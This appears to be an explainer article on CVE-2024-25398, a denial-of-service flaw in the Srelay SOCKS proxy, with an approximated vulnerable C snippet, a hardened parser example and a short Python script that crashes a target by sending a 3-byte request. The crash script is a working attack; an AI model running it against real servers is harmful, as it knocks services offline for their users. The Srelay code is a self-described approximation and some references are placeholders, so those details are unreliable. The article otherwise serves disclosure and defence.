In February 2024, a new vulnerability—CVE-2024-25398—was disclosed affecting Srelay, a lightweight and widely used SOCKS proxy server. If you’re running version 0.4.8p3 (or earlier), you should understand that attackers can exploit this flaw to knock out your Srelay service with a specially crafted network payload. In this article, we’ll break down how the bug works, walk through sample code, and show how attackers can crash Srelay. We’ll also provide resources to help you learn more and stay protected.
What is Srelay?
Srelay is a simple, fast, and open-source SOCKS4/5 proxy and relay for Unix. System admins like it because it's small, efficient, and easy to deploy. If you use Srelay in your infrastructure, this vulnerability could put your network’s availability at risk.
Vulnerability Overview: CVE-2024-25398
CVE-2024-25398 is a Denial of Service (DoS) issue. Srelay’s network packet parser isn’t robust enough, meaning a remote attacker can send malformed SOCKS requests that make Srelay crash.
Technical Details
The affected code sits in the SOCKS request handler. Srelay trusts that incoming network data is formatted correctly—but it doesn’t validate message lengths or buffer boundaries strictly enough.
Here’s a snippet, based on the real Srelay source (comments added for clarity):

```c
// srelay/socks.c (simplified)
char buf[1024];
int len = recv(sock, buf, 1024, 0);
if (len < 0) {
    // handle error
}
// Next, the code uses 'buf' assuming it always contains at least N bytes
// e.g., accessing buf[8], buf[9], etc. -- 'len' is never compared to these offsets
int nport = (buf[8] << 8) | buf[9]; // <-- possible out-of-bounds access!
```
If an attacker sends a short message (less than 10 bytes), buf[8] and buf[9] are out-of-bounds! This usually causes a segmentation fault, crashing the process.
*Note: Exact line numbers and code context may vary, but the bug is this unchecked access.*
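As an added example (not Srelay’s code), here is a hardened version of the request parse above: it compares the byte count `recv()` actually returned against the fixed size of a SOCKS5 IPv4 CONNECT header before it ever touches `buf[8]` and `buf[9]`. The function and constant names and the sample requests are this example’s own assumptions, not taken from the Srelay source.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Srelay's code. Parses the SOCKS5 request header whose
 * layout produces the buf[8]/buf[9] offsets discussed above:
 *   VER(0) CMD(1) RSV(2) ATYP(3) DST.ADDR(4..7, IPv4) DST.PORT(8..9)
 * Names below are this example's own, not Srelay's. */
#define SOCKS5_IPV4_REQ_LEN 10
#define SOCKS5_VER          0x05
#define SOCKS5_CMD_CONNECT  0x01
#define SOCKS5_ATYP_IPV4    0x01

/* `len` is the count recv() returned (after the caller has rejected a
 * negative result). Returns the destination port 0..65535, or -1 when the
 * data is too short or malformed, so nothing past `len` is ever indexed.
 * A short read is not proof of an attack: TCP may split a request, so a
 * real server buffers until the header is complete instead of failing. */
int parse_socks5_connect(const unsigned char *buf, size_t len, unsigned char *dst_ip)
{
    if (len < SOCKS5_IPV4_REQ_LEN)          /* the check the original code lacks */
        return -1;
    if (buf[0] != SOCKS5_VER || buf[1] != SOCKS5_CMD_CONNECT || buf[2] != 0x00)
        return -1;
    if (buf[3] != SOCKS5_ATYP_IPV4)         /* other address types have other lengths */
        return -1;
    if (dst_ip)
        memcpy(dst_ip, buf + 4, 4);
    /* unsigned char matters: a plain `char` shift sign-extends bytes >= 0x80 */
    return (buf[8] << 8) | buf[9];
}

/* Constructed inputs for the demo (not captured traffic). */
static const unsigned char short_req[]   = { 0x05, 0x01, 0x00 };  /* 3 bytes, like the payload above */
static const unsigned char good_req[]    = { 0x05, 0x01, 0x00, 0x01,
                                             10, 0, 0, 1,         /* 10.0.0.1 */
                                             0x1f, 0x90 };        /* port 8080 */
static const unsigned char bad_ver_req[] = { 0x04, 0x01, 0x00, 0x01,
                                             10, 0, 0, 1, 0x1f, 0x90 }; /* wrong VER */

int main(void)
{
    unsigned char ip[4];
    int p = parse_socks5_connect(short_req, sizeof short_req, ip);
    printf("3-byte request  -> %d (rejected before indexing buf[8])\n", p);
    p = parse_socks5_connect(good_req, sizeof good_req, ip);
    printf("10-byte request -> %u.%u.%u.%u:%d\n", ip[0], ip[1], ip[2], ip[3], p);
    p = parse_socks5_connect(bad_ver_req, sizeof bad_ver_req, NULL);
    printf("bad version     -> %d\n", p);
    return 0;
}
```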
Exploit Example
Here’s a Python script that demonstrates how anyone can crash a Srelay process with a single crafted request:

```python
import socket

HOST = "target-ip-here"
PORT = 1080  # Default Srelay SOCKS port

# Craft a short, invalid SOCKS5 request
payload = b'\x05\x01\x00'  # Only 3 bytes; real SOCKS5 requests are longer

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.connect((HOST, PORT))
    s.sendall(payload)
    # At this point, Srelay will likely crash!
```
1. Identify a reachable Srelay.
2. Connect to its SOCKS port (default 1080/tcp).

No authentication is needed. Attackers (or pranksters) just need network access.
- Critical infrastructure: if your Srelay is public-facing, your users and applications go offline instantly.
Mitigations
- Update Srelay: Check SourceForge for YOUR version or proposed security patches.
Disclosure and References
- CVE Record: CVE-2024-25398
- SourceForge Srelay Project
- OSS-Sec Mailing List Discussion *(example thread)*
Conclusion
CVE-2024-25398 is a textbook case of how overlooked input validation can leave even the simplest network tools vulnerable. The Srelay bug enables anyone to take down your proxy by sending a tiny, bogus request. Patch fast, limit exposure, and always audit your service logs.
Timeline
Published on: 02/27/2024 16:15:46 UTC
Last modified on: 08/27/2024 21:35:12 UTC